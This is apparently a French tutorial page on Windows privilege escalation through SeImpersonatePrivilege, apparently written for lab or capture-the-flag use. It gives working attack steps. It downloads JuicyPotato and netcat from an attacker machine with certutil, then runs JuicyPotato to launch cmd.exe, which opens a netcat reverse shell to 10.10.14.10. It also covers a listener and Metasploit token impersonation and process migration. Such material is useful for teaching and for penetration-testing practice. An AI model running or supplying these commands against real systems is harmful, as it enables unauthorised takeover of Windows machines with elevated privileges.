SeImpersonatePrivilege (whoami /priv) - Windows Privilege Escalation

Le privilège SeImpersonatePrivilege permet à un processus d'usurper l'identité d'un autre utilisateur ou processus. Cela signifie qu'il peut agir avec les permissions de cet utilisateur, souvent utilisé pour des opérations nécessitant des privilèges élevés. Ce privilège est souvent exploité dans des attaques comme Juicy Potato ou Rogue Potato pour obtenir une élévation de privilèges sur un système Windows.

Nous avons constaté que l’utilisateur possède le privilège SeImpersonatePrivilege, ce qui le rend vulnérable à certaines techniques d'élévation de privilèges. La commande ci-dessous nous confirme la présence de ce privilège :

whoami /priv

Manual Exploitatation :

Pour exploiter cette vulnérabilité, nous utiliserons JuicyPotato, un outil bien connu pour abuser de ce privilège dans le contexte Windows.

Téléchargement des Outils Nécessaires

Release Fresh potatoes · ohpe/juicy-potatoGitHub

netcat 1.11 for Win32/Win64eternallybored.org

Démarrage d'un serveur HTTP sur notre machine d'attaque pour servir les fichiers:

python3 -m http.server 8080

Transfert des Fichiers vers la Machine Cible en utilisant certutil :

certutil.exe -f -urlcache -split http://10.10.14.10:8080/JP.exe
certutil.exe -f -urlcache -split http://10.10.14.10:8080/nc64.exe

Exécution de JuicyPotato pour l’Élévation de Privilège

Nous allons maintenant exécuter JuicyPotato pour obtenir une session privilégiée. La commande suivante lance JuicyPotato, qui exécute cmd.exe avec des privilèges élevés et initie une connexion vers notre machine d'attaque via Netcat :

.\JP.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\Windows\Temp\privesc\nc.exe -e cmd 10.10.14.10 1234"

Connexion à la Session Élevée

Pour intercepter la connexion, nous nous mettons en écoute sur le port 1234 :

rlwrap nc -nvlp 1234

Metasploit exploitation

Charger le module Incognito pour l'impersonation :

load incognito
list_tokens -u

Cela affichera les tokens disponibles pour l'impersonation.

Pour changer de token et usurper l'identité d'un administrateur :

impersonate_token "ATTACKDEFENSE\Administrator"

Ensuite, utiliser getprivs pour vérifier les privilèges. Si cela ne fonctionne pas, essayer de migrer vers un autre processus.

Migration de Processus

Pour migrer vers un processus spécifique, nous pouvons utiliser pgrep pour lister les processus en cours et sélectionner un PID (par exemple, 3512 pour explorer.exe).

pgrep explorer

résultat 3512

migrate 3512

Utilisation de getprivs

Une fois le processus migré, utiliser getprivs pour vérifier si les privilèges ont été correctement escaladés.

Mis à jour il y a 8 mois

Ce contenu vous a-t-il été utile ?